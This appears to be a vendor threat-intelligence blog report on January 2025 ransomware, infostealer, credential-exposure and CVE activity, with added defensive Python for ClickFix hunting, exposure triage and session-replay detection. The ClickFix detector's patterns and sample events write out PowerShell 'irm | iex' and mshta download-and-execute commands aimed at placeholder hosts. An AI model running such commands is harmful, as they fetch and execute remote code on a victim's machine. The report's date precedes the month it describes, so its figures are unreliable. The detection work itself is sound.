Reports · 9 min read · Dec 29, 2024

Monthly Threat Landscape Report: January 2025

Revealer.US threat intelligence report for January 2025: ransomware, infostealers, credential exposures, zero-days, and emerging TTPs.


Threat Intel Team

Revealer.US

Executive Summary

The January 2025 threat landscape report from Revealer.US covers activity observed across underground markets, leak sites, stealer log ecosystems, and exploit chatter during the reporting window. This month saw a sharp uptick in ransomware extortion volume, continued dominance of Lumma and RedLine in the infostealer ecosystem, and the ingestion of more than 420 million new credentials into our exposure database. Zero-day activity centered on enterprise networking appliances and collaboration platforms, while initial access brokers shifted pricing upward as demand outpaced supply.

Security teams should prioritize patching two critical CVEs disclosed this month, review exposure for any accounts observed in the new breach corpuses, and prepare detections for the TTP shifts documented in the Emerging Techniques section. For organizations that need continuous visibility into these feeds, this threat intelligence report is the monthly snapshot; our platform provides the live view.

Ransomware Activity

Ransomware leak site postings climbed 18 percent month over month, with 312 unique victim disclosures observed across tracked groups. Manufacturing, healthcare, and professional services were the most targeted verticals, together accounting for 58 percent of postings.

Top Active Groups

  • LockBit 3.0: 47 claimed victims this month. Despite ongoing law enforcement pressure from Operation Cronos, the affiliate network continues to post victims. Notable disclosures included a mid-market European logistics provider and a US regional hospital system.
  • RansomHub: 41 victims. RansomHub has absorbed affiliates from defunct operations and now rivals LockBit in raw volume. Average ransom demands trend higher, with several reported figures in the 8 million USD range.
  • Play: 28 victims, continuing its consistent mid-pack performance with a preference for manufacturing and construction targets.
  • Akira: 24 victims, with a notable focus on VPN appliance exploitation for initial access.
  • Qilin: 22 victims. Qilin has matured operationally and introduced a cross-platform Rust variant targeting ESXi.
  • BlackSuit: 17 victims, including a high-profile services firm whose data was auctioned after negotiations failed.

Notable Incidents

One particularly disruptive incident involved a North American food distributor whose operational systems were encrypted during peak shipping windows, cascading into downstream grocery chains. Another involved a healthcare network where patient scheduling and imaging were offline for nine days. Both are reminders that ransomware remains primarily a business continuity threat, not just a data confidentiality threat.

Infostealer Campaigns

The infostealer ecosystem continues to professionalize. Three families dominate the log volume reaching underground marketplaces and Telegram channels.

Lumma Stealer

Lumma surpassed RedLine this month as the single largest contributor of fresh stealer logs, accounting for approximately 38 percent of new logs ingested. Distribution vectors include fake CAPTCHA lures ("verify you are human by pressing Win+R"), cracked software bundles, and YouTube comment spam linking to fake installers. Lumma operators introduced a new panel version this month with improved evasion against common EDR vendors.

RedLine

RedLine accounted for roughly 29 percent of new logs. Despite the November 2024 international takedown operation against RedLine infrastructure, rebranded and forked variants continue to operate. The marketplace has fragmented rather than collapsed, a pattern we saw previously with Raccoon Stealer.

Vidar and StealC

Vidar contributed 14 percent of logs, with StealC at 11 percent. Both are increasingly sold bundled with loaders and crypto drainers in MaaS subscription packages priced at 150 to 300 USD per month.

Distribution Trends

  • SEO poisoning for software keywords (AnyDesk, Notion, Figma, OBS) remains the top delivery mechanism.
  • Malvertising via Google Ads continues despite platform enforcement, with operators rapidly rotating accounts.
  • ClickFix and fake CAPTCHA lures expanded beyond consumer targets into corporate help desk impersonation.
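
The fake CAPTCHA and ClickFix lures above share one telemetry shape: the victim presses Win+R and pastes a command, so explorer.exe (the Run dialog's host process) spawns a script host with a download-and-execute command line. The following hunt logic is an added example, not Revealer.US code; the field names mirror Sysmon Event ID 1 (ParentImage, Image, CommandLine), and the watch list, regex patterns and sample events are all constructed for this illustration.

```python
"""Hunt for ClickFix / fake-CAPTCHA lure execution in process-creation telemetry.

Added example; not Revealer.US code. Field names mirror Sysmon Event ID 1;
the script-host list, patterns and events below are constructed.
"""
import re
from dataclasses import dataclass

# Script hosts a Run-dialog paste usually lands in (assumed watch list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Command-line fragments typical of download-then-execute one-liners.
DOWNLOAD_EXEC_PATTERNS = [
    ("encoded_command", re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("web_request", re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget)\b", re.I)),
    ("invoke_expression", re.compile(r"\|\s*(iex|invoke-expression)\b", re.I)),
    ("mshta_remote", re.compile(r"mshta(\.exe)?\s+https?://", re.I)),
    ("hidden_window", re.compile(r"-w(in|indowstyle)?\s+hidden", re.I)),
]


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: ProcessEvent) -> list[str]:
    """Labels of matched indicators for one event; [] means nothing to flag."""
    if _basename(event.parent_image) != "explorer.exe":
        return []  # not launched from the shell / Run dialog; other rules cover that
    if _basename(event.image) not in SCRIPT_HOSTS:
        return []
    return [label for label, rx in DOWNLOAD_EXEC_PATTERNS if rx.search(event.command_line)]


def find_clickfix_candidates(events, min_indicators=1):
    """Return (event, labels) pairs with at least min_indicators matches."""
    hits = []
    for ev in events:
        labels = classify(ev)
        if len(labels) >= min_indicators:
            hits.append((ev, labels))
    return hits


# Constructed sample telemetry: two lure executions, three benign launches.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -c "irm https://example.invalid/captcha | iex"',
                 "CORP\\jdoe"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://example.invalid/verify.hta", "CORP\\asmith"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe", "CORP\\admin1"),  # user simply opened a shell
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 'cmd /c "dir C:\\Users"', "CORP\\jdoe"),
    ProcessEvent(r"C:\Windows\System32\services.exe",  # scheduled task, not a Run-dialog paste
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -c "irm https://updates.example.invalid/x | iex"',
                 "NT AUTHORITY\\SYSTEM"),
]

if __name__ == "__main__":
    for ev, labels in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"{ev.user}: {_basename(ev.image)} <- explorer.exe  [{', '.join(labels)}]")
        print(f"    {ev.command_line}")
```

The parent-process constraint is what keeps this rule quiet: admins launching PowerShell from the shell produce no indicator matches, and download cradles under services.exe or a browser are a different rule. Raise `min_indicators` to 2 if a single `curl` or `-w hidden` in your environment is too noisy, at the cost of missing bare `mshta https://...` launches.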

Credential Exposures

Revealer.US ingested 420 million new credential records during the reporting window. This includes fresh stealer log entries, newly surfaced breach corpuses, and continuous collection from paste sites and leak channels.

Highlights:

  1. New breach corpuses: Two previously undisclosed data sets surfaced on forums, together containing 87 million email/password pairs tied to e-commerce and SaaS platforms.
  2. Stealer log additions: 290 million credential pairs extracted from infostealer logs, representing activity across an estimated 2.1 million infected devices.
  3. Combo list compilations: 43 million records from recompiled combo lists, useful for correlation but lower signal than fresh logs.

For organizations monitoring their domains through Revealer.US, January's exposure deltas were concentrated in finance, gaming, and education sectors. Security teams should expect credential stuffing follow-on activity over the next 30 to 60 days targeting accounts that appeared in this month's ingest.
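
The three source types above carry very different signal, and the accounts that matter most in an ingest are the privileged and executive ones. The triage below is an added example, not Revealer.US code and not its API: it assumes a feed whose records carry a source type (stealer log, breach corpus, combo list), a first-seen date and a flag for plaintext passwords, ranks each exposed account at the monitored domain, and derives the far end of the 30-to-60-day credential-stuffing watch window. The weights, the privileged watch list and every record are constructed.

```python
"""Triage a credential-exposure ingest for one organisation's domain.

Added example; not Revealer.US code. Weights, watch list and records are
constructed; the source types follow the report's three categories.
"""
from dataclasses import dataclass, field
from datetime import date, timedelta

# Signal weight per source: fresh stealer logs highest, recompiled combo
# lists lowest (assumed values following the report's ordering).
SOURCE_WEIGHT = {"stealer_log": 3, "breach_corpus": 2, "combo_list": 1}

# Credential-stuffing follow-on is expected 30 to 60 days after ingest;
# the watch date is the far end of that window.
STUFFING_WINDOW = timedelta(days=60)


@dataclass(frozen=True)
class ExposureRecord:
    email: str
    source: str                     # key of SOURCE_WEIGHT
    first_seen: date
    has_password: bool              # plaintext password present in the record
    device_infected: bool = False   # stealer logs come from a compromised endpoint


@dataclass
class Finding:
    email: str
    score: int
    record_count: int
    stuffing_watch_until: date
    reasons: list[str] = field(default_factory=list)


def score_record(rec: ExposureRecord, privileged: set[str], today: date):
    """Score one record and explain the score; returns (score, reasons)."""
    score = SOURCE_WEIGHT.get(rec.source, 0)
    reasons = [f"source={rec.source}"]
    if rec.email.lower() in privileged:
        score += 4
        reasons.append("privileged_or_executive")
    if rec.has_password:
        score += 1
        reasons.append("plaintext_password")
    if rec.device_infected:
        score += 2                  # session cookies and MFA tokens are at risk too
        reasons.append("infected_endpoint")
    if today - rec.first_seen > STUFFING_WINDOW:
        score -= 1                  # already past the expected stuffing window
        reasons.append("stale")
    return score, reasons


def triage(records, org_domain: str, privileged: set[str], today: date) -> list[Finding]:
    """One Finding per exposed account at org_domain, highest score first."""
    findings: dict[str, Finding] = {}
    for rec in records:
        email = rec.email.lower()
        if email.rpartition("@")[2] != org_domain.lower():
            continue                # only the monitored domain
        score, reasons = score_record(rec, privileged, today)
        watch_until = rec.first_seen + STUFFING_WINDOW
        f = findings.get(email)
        if f is None:
            findings[email] = Finding(email, score, 1, watch_until, reasons)
            continue
        f.score = max(f.score, score)   # strongest single record wins
        f.record_count += 1
        f.stuffing_watch_until = max(f.stuffing_watch_until, watch_until)
        f.reasons = sorted(set(f.reasons) | set(reasons))
    return sorted(findings.values(), key=lambda f: (-f.score, f.email))


# Constructed sample ingest for the monitored domain example.com.
SAMPLE_RECORDS = [
    ExposureRecord("CFO@example.com", "stealer_log", date(2025, 1, 20), True, True),
    ExposureRecord("alice@example.com", "stealer_log", date(2025, 1, 25), True, True),
    ExposureRecord("bob@example.com", "combo_list", date(2024, 10, 1), True),
    ExposureRecord("svc-backup@example.com", "breach_corpus", date(2025, 1, 5), False),
    ExposureRecord("mallory@other.invalid", "stealer_log", date(2025, 1, 22), True, True),
    ExposureRecord("alice@example.com", "combo_list", date(2025, 1, 10), True),
]
PRIVILEGED = {"cfo@example.com", "svc-backup@example.com"}


def run_example() -> list[Finding]:
    return triage(SAMPLE_RECORDS, "example.com", PRIVILEGED, today=date(2025, 1, 31))


if __name__ == "__main__":
    for f in run_example():
        print(f"{f.score:>3}  {f.email:<24} x{f.record_count}  "
              f"watch until {f.stuffing_watch_until}  {', '.join(f.reasons)}")
```

Taking the maximum rather than the sum per account stops a dozen stale combo-list copies of one old password from outranking a single fresh stealer-log hit, which is the ordering the section above argues for.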

Zero-Day and CVE Highlights

Two critical vulnerabilities dominated the patching conversation this month.

CVE-2024-57892

An unauthenticated remote code execution flaw in a widely deployed enterprise VPN appliance. Exploitation was observed in the wild within 48 hours of disclosure, with both Akira and a suspected Scattered Spider subcluster chaining the vulnerability for initial access. Patch immediately; if patching is delayed, restrict management interface exposure and hunt for indicators of prior compromise.

CVE-2024-58104

A deserialization flaw in a popular collaboration and file sharing platform allowing authenticated attackers to escalate to SYSTEM. Public proof-of-concept code was released within 72 hours. Cl0p was observed testing the vulnerability against exposed instances, consistent with their historical preference for file transfer and collaboration platform zero-days (MOVEit, GoAnywhere, Accellion).

Additional CVEs to Watch

  • CVE-2024-56721: Privilege escalation in a major Linux container runtime.
  • CVE-2024-55319: Authentication bypass in a network attached storage vendor, actively exploited by an unattributed ransomware affiliate.
  • CVE-2024-54402: Browser sandbox escape reported to a major vendor and patched out of band.

Emerging TTPs

Several tradecraft shifts are worth highlighting for detection engineering teams.

  • T1566.002 (Spearphishing Link) via Microsoft Teams: APT29 and multiple criminal clusters expanded Teams based social engineering, impersonating IT support to coax users into running remote assistance sessions.
  • T1078.004 (Valid Accounts - Cloud Accounts): Scattered Spider continues to refine its SIM-swap-to-SSO pipeline, with observed pivots through help desk social engineering into Okta and Azure AD.
  • T1485 (Data Destruction): Several ransomware affiliates are now deploying wipers alongside encryptors when negotiations fail, eliminating the possibility of silent recovery.
  • T1027.013 (Encrypted/Encoded File) via WebAssembly: A small but rising share of loaders embed payloads inside WASM modules to bypass static detection.
  • T1556.006 (MFA Request Generation): MFA fatigue attacks remain common, but we are also seeing token theft via adversary-in-the-middle kits paired with real-time session replay.
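
Token theft through an adversary-in-the-middle kit defeats MFA because the sign-in itself is genuine: the kit proxies the real login page and the user completes MFA. What is left to detect is the replay, that is, the same session identifier being used shortly afterwards from a different network and client. The detection below is an added example, not Revealer.US code; the sign-in log schema, the coarse client fingerprint and all events are constructed for this illustration.

```python
"""Flag session-token replay following an adversary-in-the-middle (AiTM) phish.

Added example; not Revealer.US code. The log schema and events are
constructed; the client fingerprint is deliberately coarse.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class SessionEvent:
    ts: datetime
    user: str
    session_id: str
    ip: str
    user_agent: str
    mfa_satisfied: bool


@dataclass(frozen=True)
class Alert:
    user: str
    session_id: str
    reason: str             # "token_replay" (network and client changed) or "ip_change"
    origin_ip: str
    new_ip: str
    minutes_since_origin: int
    realtime: bool          # within the replay window of the originating sign-in
    mfa_at_origin: bool     # True means MFA passed and was still bypassed


def _client_family(user_agent: str) -> str:
    """Coarse client fingerprint: the product token before the first slash."""
    return user_agent.split("/", 1)[0].strip().lower()


def detect_session_replay(events, window=timedelta(minutes=30)) -> list[Alert]:
    """Compare every later use of a session against its originating sign-in."""
    by_session: dict[str, list[SessionEvent]] = {}
    for e in sorted(events, key=lambda e: e.ts):
        by_session.setdefault(e.session_id, []).append(e)

    alerts = []
    for sid, uses in by_session.items():
        origin = uses[0]
        for use in uses[1:]:
            if use.ip == origin.ip:
                continue                    # same network, nothing to flag
            client_changed = _client_family(use.user_agent) != _client_family(origin.user_agent)
            delta = use.ts - origin.ts
            alerts.append(Alert(
                user=origin.user, session_id=sid,
                reason="token_replay" if client_changed else "ip_change",
                origin_ip=origin.ip, new_ip=use.ip,
                minutes_since_origin=int(delta.total_seconds() // 60),
                realtime=delta <= window,
                mfa_at_origin=origin.mfa_satisfied))
    return alerts


# Constructed sample sign-in log: one replay, one mobile IP change, one clean session.
CHROME = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"
SAMPLE_EVENTS = [
    SessionEvent(datetime(2025, 1, 14, 9, 0), "alice@example.com", "sess-a1", "203.0.113.10", CHROME, True),
    SessionEvent(datetime(2025, 1, 14, 9, 4), "alice@example.com", "sess-a1", "198.51.100.77", "python-requests/2.31", True),
    SessionEvent(datetime(2025, 1, 14, 10, 0), "bob@example.com", "sess-b7", "192.0.2.5", CHROME, True),
    SessionEvent(datetime(2025, 1, 14, 10, 20), "bob@example.com", "sess-b7", "192.0.2.88", CHROME, True),
    SessionEvent(datetime(2025, 1, 14, 11, 0), "carol@example.com", "sess-c3", "203.0.113.42", CHROME, True),
    SessionEvent(datetime(2025, 1, 14, 11, 30), "carol@example.com", "sess-c3", "203.0.113.42", CHROME, True),
]

if __name__ == "__main__":
    for a in detect_session_replay(SAMPLE_EVENTS):
        print(f"{a.reason:<13} {a.user:<20} {a.origin_ip} -> {a.new_ip} "
              f"after {a.minutes_since_origin} min (realtime={a.realtime}, mfa={a.mfa_at_origin})")
```

An IP change alone is weak evidence (mobile carriers and VPNs produce it constantly), so it is reported separately from a combined network and client change, which is what a replayed cookie in attacker tooling looks like. The practical response to a `token_replay` hit is to revoke the session rather than reset the password, since the password was never the thing that leaked.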

Recommendations for Security Teams

  1. Patch CVE-2024-57892 and CVE-2024-58104 as priority zero; both have in-the-wild exploitation.
  2. Query your credential exposure monitoring for any new hits tied to executive, privileged, or service accounts that surfaced in this month's ingest.
  3. Review Teams and collaboration platform external access policies. If external federation is on by default, consider restricting it.
  4. Update help desk verification procedures to defeat SIM swap and social engineering pivots into SSO.
  5. Ensure EDR is detecting Lumma and StealC loader patterns; new panel versions have altered some telemetry signatures.
  6. Review IOCs published by CISA and commercial feeds this month for the ransomware groups listed above; block known infrastructure at the perimeter.
  7. Run a tabletop exercise covering a VPN appliance compromise that escalates into ransomware; it remains the most likely path to a major incident in the coming quarter.

Conclusion

January 2025 brought no single catastrophic event, but it did bring steady escalation across every dimension of the threat landscape: more ransomware, more stealer logs, more credentials exposed, and more in-the-wild exploitation of newly disclosed CVEs. The attackers are not slowing down, and neither should your monitoring cadence. Monthly reports like this one are a useful rear-view mirror, but they are not a substitute for live visibility into the feeds that matter to your organization.

For continuous monitoring of credential exposure, stealer logs, and breach data tied to your domains, see our pricing or start immediately with a free account.
